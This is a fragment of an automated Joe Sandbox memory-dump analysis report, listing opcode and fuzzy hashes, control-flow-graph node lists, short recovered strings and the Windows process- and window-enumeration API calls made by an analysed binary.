                                                    • Opcode Fuzzy Hash: 617968de7952f39a88133ceff69fd6c076b8e2ddd1694ec8533b46eea59b8b17
                                                    • Instruction Fuzzy Hash: C7918C32F145248FC754EB69D880AAEB3E7AFC8614F1AC1A5E446EB755DF30EC418B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d56b65b8084a179bd0d1d25d174f04a5bec350033d7ebd5a9e0acab3ae480a83
                                                    • Instruction ID: d368cc4ce900b4959c58239cbbcb9bb49e5ed560ac71db6dea9be1e72870283e
                                                    • Opcode Fuzzy Hash: d56b65b8084a179bd0d1d25d174f04a5bec350033d7ebd5a9e0acab3ae480a83
                                                    • Instruction Fuzzy Hash: 3B816935B002198FCB14DF69D59489EB7F9EF88314B1680A9E946EB320DB31EC42CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44f2e0085c2344b2aadeb006dbc4ae4196d22b4af15c03c9b9f5d2c00ed5bf79
                                                    • Instruction ID: 16c9b1dee777a94fb41c54bee043e42d1a1fce42bf1c4248bed8c9d15732ef80
                                                    • Opcode Fuzzy Hash: 44f2e0085c2344b2aadeb006dbc4ae4196d22b4af15c03c9b9f5d2c00ed5bf79
                                                    • Instruction Fuzzy Hash: E871BE35E012299BDB04DB79C8446AEB7F3BF88305F4495A9D406BB368DF30AD06DB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 1069b20-1069b55 call 1069ab8 3 1069b57-1069b67 0->3 4 1069b8a-1069b99 0->4 9 1069b7f-1069b89 3->9 10 1069b69-1069b6f 3->10 5 1069ba0-1069bc3 call 1069ab8 4->5 6 1069b9b 4->6 15 1069bc5-1069bd5 5->15 16 1069c0b-1069c19 call 1069cd0 5->16 6->5 12 1069b73-1069b75 10->12 13 1069b71 10->13 12->9 13->9 21 1069bd7-1069bdd 15->21 22 1069bed-1069c06 15->22 19 1069c22-1069c31 16->19 20 1069c1b-1069c20 16->20 29 1069c39 19->29 24 1069c3c-1069c40 20->24 25 1069be1-1069be3 21->25 26 1069bdf 21->26 23 1069c89-1069c8f 22->23 27 1069c91 23->27 28 1069c99 23->28 30 1069c42-1069c66 24->30 31 1069c6e-1069c87 24->31 25->22 26->22 27->28 29->24 30->31 31->23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `=$`=$`=$`=$`=
                                                    • API String ID: 0-4025563824
                                                    • Opcode ID: dfc293d714f132d9a0994929bf30871637293ff157e03375a0e400a7963136aa
                                                    • Instruction ID: 1706ab0c0d569974a7c3968ba00a75ca3f05dd616be7fc7a535a76dac3db9d03
                                                    • Opcode Fuzzy Hash: dfc293d714f132d9a0994929bf30871637293ff157e03375a0e400a7963136aa
                                                    • Instruction Fuzzy Hash: E541BE30B04209CFDB24DB69E940BAEBBFAEB84318F208469D546AB754CB35D941CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 975 10697e8-1069823 977 1069825-106983b 975->977 978 1069879-10698a4 975->978 983 1069853-1069861 977->983 984 106983d-1069843 977->984 981 10698a6-10698ab call 1069b20 978->981 982 10698d2-10698e7 978->982 989 10698b1-10698b3 981->989 996 1069913-1069917 982->996 997 10698e9-10698f4 982->997 987 1069863 983->987 988 106986c-1069876 983->988 985 1069847-1069849 984->985 986 1069845 984->986 985->983 986->983 987->988 989->982 991 10698b5-10698b7 989->991 992 10698c5-10698cf 991->992 993 10698b9-10698bf 991->993 993->992 995 1069a91-1069ac8 993->995 1008 1069aca 995->1008 1009 1069af9-1069b00 995->1009 998 1069a65-1069a6f 996->998 999 106991d-1069943 996->999 997->996 1002 10698f6-1069911 997->1002 1010 1069945 999->1010 1011 106994a-106994c 999->1011 1002->996 1012 1069acd-1069ad3 1008->1012 1010->1011 1013 106994e-1069966 1011->1013 1014 106996c-1069972 1011->1014 1017 1069ad5-1069ae8 1012->1017 1018 1069b03-1069b1b 1012->1018 1023 106999a-10699ea call 1067fa8 1013->1023 1024 1069968-106996a 1013->1024 1015 1069974 1014->1015 1016 106997c-1069995 1014->1016 1015->1016 1019 1069a47-1069a57 1016->1019 1026 1069af3-1069af7 1017->1026 1027 1069aea-1069af0 1017->1027 1030 1069a62 1019->1030 1031 1069a59 1019->1031 1036 1069a10 1023->1036 1037 10699ec-1069a0e call 1067fa8 1023->1037 1024->1014 1024->1023 1026->1009 1026->1012 1030->998 1031->1030 1038 1069a13-1069a17 1036->1038 1037->1038 1041 1069a32-1069a45 1038->1041 1042 1069a19-1069a1b call 106a6f0 1038->1042 1041->1019 1044 1069a21-1069a27 1042->1044 1044->1041
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45$45$45
                                                    • API String ID: 0-328510009
                                                    • Opcode ID: 5bdab442d2ee4a9a2c8bdb45cab37f79996e32d6b9351eabd82a6227c218e4f9
                                                    • Instruction ID: 36c6322bc8fae5d6bb9e10a0def632d6be31e2a7b9e77b96843ab1fbd99af130
                                                    • Opcode Fuzzy Hash: 5bdab442d2ee4a9a2c8bdb45cab37f79996e32d6b9351eabd82a6227c218e4f9
                                                    • Instruction Fuzzy Hash: 4E91AD31B01205CFDB15DFA9D954AADBBF6BF88204F1440AAE945EB391CB35CD41CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1047 106bef0-106bf0b 1049 106bf11-106bf13 1047->1049 1050 106bfff-106c023 1047->1050 1051 106c02a-106c04e 1049->1051 1052 106bf19-106bf25 1049->1052 1050->1051 1063 106c055-106c079 1051->1063 1057 106bf27-106bf33 1052->1057 1058 106bf39-106bf49 1052->1058 1057->1058 1057->1063 1058->1063 1064 106bf4f-106bf5d 1058->1064 1069 106c080-106c105 call 10697e8 1063->1069 1068 106bf63-106bf68 1064->1068 1064->1069 1104 106bf6a call 106bef0 1068->1104 1105 106bf6a call 106c0e8 1068->1105 1106 106bf6a call 106c0f8 1068->1106 1097 106c10a-106c118 call 106b870 1069->1097 1071 106bf70-106bfb9 1086 106bfdc-106bffc call 106a620 1071->1086 1087 106bfbb-106bfd4 1071->1087 1087->1086 1100 106c130-106c132 1097->1100 1101 106c11a-106c120 1097->1101 1102 106c124-106c126 1101->1102 1103 106c122 1101->1103 1102->1100 1103->1100 1104->1071 1105->1071 1106->1071
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45$45$8L
                                                    • API String ID: 0-3226708014
                                                    • Opcode ID: 348c057b255765a17ef76f197424dca6708baebf1c91bca5713be56a18276c88
                                                    • Instruction ID: bc22f64896f81abe379c62654a703ec0d09ff1860995100b94b79565e29b343b
                                                    • Opcode Fuzzy Hash: 348c057b255765a17ef76f197424dca6708baebf1c91bca5713be56a18276c88
                                                    • Instruction Fuzzy Hash: 2251CD343042088FD725AF74C86496E77EAEF86208B1184BDD686DB7A1DF36DC46CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1107 106921e-1069246 1120 1069249 call 10697e4 1107->1120 1121 1069249 call 10697e8 1107->1121 1108 106924f-1069253 1109 10692a4-106934d 1108->1109 1110 1069255-1069267 1108->1110 1113 106927f-1069287 1110->1113 1114 1069269-106926f 1110->1114 1113->1109 1117 1069289-10692a2 1113->1117 1115 1069273-1069275 1114->1115 1116 1069271 1114->1116 1115->1113 1116->1113 1117->1109 1120->1108 1121->1108
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45$45
                                                    • API String ID: 0-2907692913
                                                    • Opcode ID: 8672adc07a1de1d4d4788f5638b290e460b69e6a9af2d60644f857556b851400
                                                    • Instruction ID: abb23b911d79951762aee4b1d5fe07591c238d0cc6ffc706da46f9cd7d51830a
                                                    • Opcode Fuzzy Hash: 8672adc07a1de1d4d4788f5638b290e460b69e6a9af2d60644f857556b851400
                                                    • Instruction Fuzzy Hash: EA11A031B042169FCF60DBB898117AEBBF6BB88700F104169E546EB380DA75C902CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1122 10210b5-1021123 1125 1021192-10211d1 K32GetModuleBaseNameA 1122->1125 1126 1021125-102114a 1122->1126 1127 10211d3-10211d9 1125->1127 1128 10211da-10211e8 1125->1128 1133 102117a-102117f 1126->1133 1134 102114c-102114e 1126->1134 1127->1128 1129 10211ea-10211f6 1128->1129 1130 10211fe-1021225 1128->1130 1129->1130 1139 1021227-102122b 1130->1139 1140 1021235 1130->1140 1142 1021181-102118d 1133->1142 1137 1021170-1021178 1134->1137 1138 1021150-102115a 1134->1138 1137->1142 1144 102115e-102116c 1138->1144 1145 102115c 1138->1145 1139->1140 1141 102122d 1139->1141 1147 1021236 1140->1147 1141->1140 1142->1125 1144->1144 1146 102116e 1144->1146 1145->1144 1146->1137 1147->1147
                                                    APIs
                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 010211C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: BaseModuleName
                                                    • String ID:
                                                    • API String ID: 595626670-0
                                                    • Opcode ID: 746e5241c4cfcc95c4d44149a071ce42bc1fb99513d733a6c5bf79bc7092b64d
                                                    • Instruction ID: b1c70e8f7382d697a217c1fb0d7c27e4a8200de08ea4e525878a7295f01ceb84
                                                    • Opcode Fuzzy Hash: 746e5241c4cfcc95c4d44149a071ce42bc1fb99513d733a6c5bf79bc7092b64d
                                                    • Instruction Fuzzy Hash: 72416570E042689FDB14CF99C894B9EBBF1BF49314F24806DE859AB380C7749845CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1148 10210c0-1021123 1150 1021192-10211d1 K32GetModuleBaseNameA 1148->1150 1151 1021125-102114a 1148->1151 1152 10211d3-10211d9 1150->1152 1153 10211da-10211e8 1150->1153 1158 102117a-102117f 1151->1158 1159 102114c-102114e 1151->1159 1152->1153 1154 10211ea-10211f6 1153->1154 1155 10211fe-1021225 1153->1155 1154->1155 1164 1021227-102122b 1155->1164 1165 1021235 1155->1165 1167 1021181-102118d 1158->1167 1162 1021170-1021178 1159->1162 1163 1021150-102115a 1159->1163 1162->1167 1169 102115e-102116c 1163->1169 1170 102115c 1163->1170 1164->1165 1166 102122d 1164->1166 1172 1021236 1165->1172 1166->1165 1167->1150 1169->1169 1171 102116e 1169->1171 1170->1169 1171->1162 1172->1172
                                                    APIs
                                                    • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 010211C1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: BaseModuleName
                                                    • String ID:
                                                    • API String ID: 595626670-0
                                                    • Opcode ID: 4f67cd3c8b9cbfbeb29a999a99a1cb4aa67f183e398b035b3d9761257bab72f0
                                                    • Instruction ID: ffe9df1fb2b2867bdda185eb620d5989d234f0726dfb9f360d627db82ab8bb16
                                                    • Opcode Fuzzy Hash: 4f67cd3c8b9cbfbeb29a999a99a1cb4aa67f183e398b035b3d9761257bab72f0
                                                    • Instruction Fuzzy Hash: 14415470E042189FDB14CFA9C894B9EBBF1BF48314F248069E859AB390C7749885CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1173 1021317-102180a 1177 1021816-1021845 EnumChildWindows 1173->1177 1178 102180c-1021814 1173->1178 1179 1021847-102184d 1177->1179 1180 102184e-102187b 1177->1180 1178->1177 1179->1180
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 01021838
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID:
                                                    • API String ID: 3555792229-0
                                                    • Opcode ID: a083d6666ddb158241ef0fcb6c8b1c21bfe07bacb7271458c204bac36c726ec3
                                                    • Instruction ID: 59cadd5d060dde3e0038357e499b7e1ab1ef17715e6ed022ce6ea9c961a21cd1
                                                    • Opcode Fuzzy Hash: a083d6666ddb158241ef0fcb6c8b1c21bfe07bacb7271458c204bac36c726ec3
                                                    • Instruction Fuzzy Hash: C62178719042198FDB10CF99C984BEEBBF5EF88324F14846AD494A3650DB78A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1184 10217b9-102180a 1187 1021816-1021845 EnumChildWindows 1184->1187 1188 102180c-1021814 1184->1188 1189 1021847-102184d 1187->1189 1190 102184e-102187b 1187->1190 1188->1187 1189->1190
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 01021838
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID:
                                                    • API String ID: 3555792229-0
                                                    • Opcode ID: d296aabf2f1c82c3e44d24674fd7142ebe14fbfdfe4d6c30cecd1fe2cf5bb814
                                                    • Instruction ID: e2308e1b42ea1c4eab09347697bc84fd65145c6799339e6a0cca49aca95c8e1e
                                                    • Opcode Fuzzy Hash: d296aabf2f1c82c3e44d24674fd7142ebe14fbfdfe4d6c30cecd1fe2cf5bb814
                                                    • Instruction Fuzzy Hash: 50219871D042098FDB10CF9AC884BEEFBF4AF88310F14842AD454A3350CB78A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1194 1020c89-1020cdf 1196 1020ce1-1020ce9 1194->1196 1197 1020ceb-1020d20 K32EnumProcesses 1194->1197 1196->1197 1198 1020d22-1020d28 1197->1198 1199 1020d29-1020d4a 1197->1199 1198->1199
                                                    APIs
                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 01020D13
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: EnumProcesses
                                                    • String ID:
                                                    • API String ID: 84517404-0
                                                    • Opcode ID: fd8ff85d000c845ed2eae5276bcdf98ae8e1944f12bbdbb02a7eb40953b6a186
                                                    • Instruction ID: 3cd0853e9dbc470a2c2b691a8de0259ff450b0c08b35a380346a1dbf1be3eec1
                                                    • Opcode Fuzzy Hash: fd8ff85d000c845ed2eae5276bcdf98ae8e1944f12bbdbb02a7eb40953b6a186
                                                    • Instruction Fuzzy Hash: D32123B5D016199FCB00CF99C884BDEFBF4BB48320F14816AE908A7240D778A944CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1201 1021324-102180a 1204 1021816-1021845 EnumChildWindows 1201->1204 1205 102180c-1021814 1201->1205 1206 1021847-102184d 1204->1206 1207 102184e-102187b 1204->1207 1205->1204 1206->1207
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00000000,?), ref: 01021838
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID:
                                                    • API String ID: 3555792229-0
                                                    • Opcode ID: 2881c9e3db654a78123e7abafb31fb1052f3d1194f3d8d8d9fc973b33802001b
                                                    • Instruction ID: 2985a43cd74f35903f056ada23d425ab4710f428ad75e88d15e29d930ca3360e
                                                    • Opcode Fuzzy Hash: 2881c9e3db654a78123e7abafb31fb1052f3d1194f3d8d8d9fc973b33802001b
                                                    • Instruction Fuzzy Hash: D7216571D042198FDB10CF9AC984BEEFBF5EB88314F14842AE454A3350DB78A945CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1211 1020c90-1020cdf 1213 1020ce1-1020ce9 1211->1213 1214 1020ceb-1020d20 K32EnumProcesses 1211->1214 1213->1214 1215 1020d22-1020d28 1214->1215 1216 1020d29-1020d4a 1214->1216 1215->1216
                                                    APIs
                                                    • K32EnumProcesses.KERNEL32(00000000,?,?), ref: 01020D13
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: EnumProcesses
                                                    • String ID:
                                                    • API String ID: 84517404-0
                                                    • Opcode ID: fe110654b0c708fbbd258ea867631dcc5fa9fdb94668d0d12c305cd34f193f88
                                                    • Instruction ID: e8b2d61b95f81d6e2e724ecaa043530be5c58d09eb327704bd32703fcb1c56cf
                                                    • Opcode Fuzzy Hash: fe110654b0c708fbbd258ea867631dcc5fa9fdb94668d0d12c305cd34f193f88
                                                    • Instruction Fuzzy Hash: 7E2104B5D016199FDB00CF99C884BDEFBF4FB48314F14812AE908A3340D778A944CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1218 1020ff1-1021078 K32EnumProcessModules 1221 1021081-10210a9 1218->1221 1222 102107a-1021080 1218->1222 1222->1221
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0102106B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 34a8337b91d15e527188b3f78aa0540b9b43e13bc187c694f8a4195c2def8409
                                                    • Instruction ID: 24cc8ea406ce8fcbc55d47c002fff0254a3d2af0de1cd7159acb7903e654e488
                                                    • Opcode Fuzzy Hash: 34a8337b91d15e527188b3f78aa0540b9b43e13bc187c694f8a4195c2def8409
                                                    • Instruction Fuzzy Hash: F82147719042499FCB10CF9AC484BDEBBF4FF48324F108429E498A7240C778A545DFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1225 1020ff8-1021078 K32EnumProcessModules 1227 1021081-10210a9 1225->1227 1228 102107a-1021080 1225->1228 1228->1227
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 0102106B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552511415.0000000001020000.00000040.00000800.00020000.00000000.sdmp, Offset: 01020000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1020000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 64b8ddf853dbc81e64007d4e860452d8061386922135537224f291d4d9bed7e8
                                                    • Instruction ID: 8a995590c5aca6692593e99e8500c5bce9b33a8508ecfd0c0266b78f77b37e4d
                                                    • Opcode Fuzzy Hash: 64b8ddf853dbc81e64007d4e860452d8061386922135537224f291d4d9bed7e8
                                                    • Instruction Fuzzy Hash: F42136B59042499FCB10CF9AC584BDEBBF4FF48324F118429E558A7200D779A985CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45
                                                    • API String ID: 0-558172947
                                                    • Opcode ID: 6a88705edc47ce7d25d8042d6450ce9ae8defd2c51175e912c3075e75f4621e6
                                                    • Instruction ID: bf106d68e55a2ea60260e4fe1c27779235202398b95af2b6802f6f2d22e01e0d
                                                    • Opcode Fuzzy Hash: 6a88705edc47ce7d25d8042d6450ce9ae8defd2c51175e912c3075e75f4621e6
                                                    • Instruction Fuzzy Hash: 24E0923A3593D0DFE7111AB44A117913BED9B07605F1400EAE7D69F282C5668842C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 45
                                                    • API String ID: 0-558172947
                                                    • Opcode ID: 8e2cf53e561a16561a83aa5e7d9f886572982857abe79595bab834e688d8c1d9
                                                    • Instruction ID: 6e7a48b855878aef03962b72f01e472f525cecb82bd1e15fa4ac89f2ab344c77
                                                    • Opcode Fuzzy Hash: 8e2cf53e561a16561a83aa5e7d9f886572982857abe79595bab834e688d8c1d9
                                                    • Instruction Fuzzy Hash: 34D05B31351354DFEB20667499017D573DC5B46759F1004A5E6C95F280D9B7E841C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f13b4abb77caa353beb37cac815c4a12081483f8aeffbf00f1848d4dc9fe0bb
                                                    • Instruction ID: 55f16982ea7cd3ff6b36b260e8946ab4e4d94c2cc2db45764ad06c595cccd47f
                                                    • Opcode Fuzzy Hash: 2f13b4abb77caa353beb37cac815c4a12081483f8aeffbf00f1848d4dc9fe0bb
                                                    • Instruction Fuzzy Hash: 9502F1343042058FDB44EB78C8616BE36D79FC9208B198579E646DF786DF34DC4A87A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 79317f67312f2488d32ad083783bb1577a40743e4229826021db0c310e6f497e
                                                    • Instruction ID: 9e616d9f9f053f3078abe434aa56b5c131392b037e785fb8b91cc24659e89133
                                                    • Opcode Fuzzy Hash: 79317f67312f2488d32ad083783bb1577a40743e4229826021db0c310e6f497e
                                                    • Instruction Fuzzy Hash: 6A227B31A00219CFEB15DFA9C950AADBBF6BF58300F148455E881BB2A4DB34DE46CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c575cdb75342d77a7b9f0615e52ac0cf5e33d62f00cd66169b12498a3c3430ff
                                                    • Instruction ID: f3709005643b965d94c24bb5df707704e5ec307d297c90d69a6110f50bee0e66
                                                    • Opcode Fuzzy Hash: c575cdb75342d77a7b9f0615e52ac0cf5e33d62f00cd66169b12498a3c3430ff
                                                    • Instruction Fuzzy Hash: B4C1B6317082918FC711CB6DC88056EBBF6AF85318B19C5EAD0DA8B753C675EC42CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6827c493b6f9f7da11d3441903b1296750bff164562f200a059dd4353fbcd5dc
                                                    • Instruction ID: 80d06931840a148aec779b132743825b4af16b792f69d95d5c81bc145e04cfff
                                                    • Opcode Fuzzy Hash: 6827c493b6f9f7da11d3441903b1296750bff164562f200a059dd4353fbcd5dc
                                                    • Instruction Fuzzy Hash: 35810474E052188FCB14DFA9C950AAEBBB2FF89304F108469D109BB364DB359985CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.552719422.0000000001060000.00000040.00000800.00020000.00000000.sdmp, Offset: 01060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1060000_64AE5410F978DF0F48DCC67508820EA230C566967E002.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 757975b4c6f9425a3e5b349735467b671681877e20a9c893ae4b80099c2e817f
                                                    • Instruction ID: cd311ecb9f1c582eb9147de2871d7ab92db8b4122134101144cb31d5708a79cb
                                                    • Opcode Fuzzy Hash: 757975b4c6f9425a3e5b349735467b671681877e20a9c893ae4b80099c2e817f
